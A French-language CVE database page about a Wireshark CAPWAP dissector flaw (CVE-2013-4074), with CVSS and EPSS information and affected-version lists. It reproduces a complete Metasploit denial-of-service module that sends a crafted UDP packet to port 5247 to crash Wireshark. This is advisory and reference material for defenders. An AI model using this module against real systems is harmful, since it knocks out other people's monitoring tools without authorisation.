Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-189 |
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 33556
Date de publication : 2014-05-27 22h00 +00:00
Auteur : j0sm1
EDB Vérifié : Yes
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark CAPWAP Dissector DoS',
'Description' => %q{
This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0
to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an
incomplete packet.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Laurent Butti', # Discovery vulnerability
'j0sm1' # Auxiliary msf module
],
'References' =>
[
['CVE', '2013-4074'],
['OSVDB', '94091'],
['BID', '60500']
],
'DisclosureDate' => 'Apr 28 2014'))
# Protocol capwap needs port 5247 to trigger the dissector in wireshark
register_options([ Opt::RPORT(5247) ], self.class)
end
def run
connect_udp
# We send a packet incomplete to crash dissector
print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
# With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
# the dissector crash
# You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
# F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
udp_sock.put(buf)
disconnect_udp
end
end
Products Mentioned
Configuraton 0
Wireshark>>Wireshark >> Version 1.6.0
Wireshark>>Wireshark >> Version 1.6.1
Wireshark>>Wireshark >> Version 1.6.2
Wireshark>>Wireshark >> Version 1.6.3
Wireshark>>Wireshark >> Version 1.6.4
Wireshark>>Wireshark >> Version 1.6.5
Wireshark>>Wireshark >> Version 1.6.6
Wireshark>>Wireshark >> Version 1.6.7
Wireshark>>Wireshark >> Version 1.6.8
Wireshark>>Wireshark >> Version 1.6.9
Wireshark>>Wireshark >> Version 1.6.10
Wireshark>>Wireshark >> Version 1.6.11
Wireshark>>Wireshark >> Version 1.6.12
Wireshark>>Wireshark >> Version 1.6.13
Wireshark>>Wireshark >> Version 1.6.14
Wireshark>>Wireshark >> Version 1.6.15
Configuraton 0
Debian>>Debian_linux >> Version 7.0
Opensuse>>Opensuse >> Version 11.4
Opensuse>>Opensuse >> Version 12.2
Opensuse>>Opensuse >> Version 12.3
Configuraton 0
Wireshark>>Wireshark >> Version 1.8.0
Wireshark>>Wireshark >> Version 1.8.1
Wireshark>>Wireshark >> Version 1.8.2
Wireshark>>Wireshark >> Version 1.8.3
Wireshark>>Wireshark >> Version 1.8.4
Wireshark>>Wireshark >> Version 1.8.5
Wireshark>>Wireshark >> Version 1.8.6
Wireshark>>Wireshark >> Version 1.8.7
Références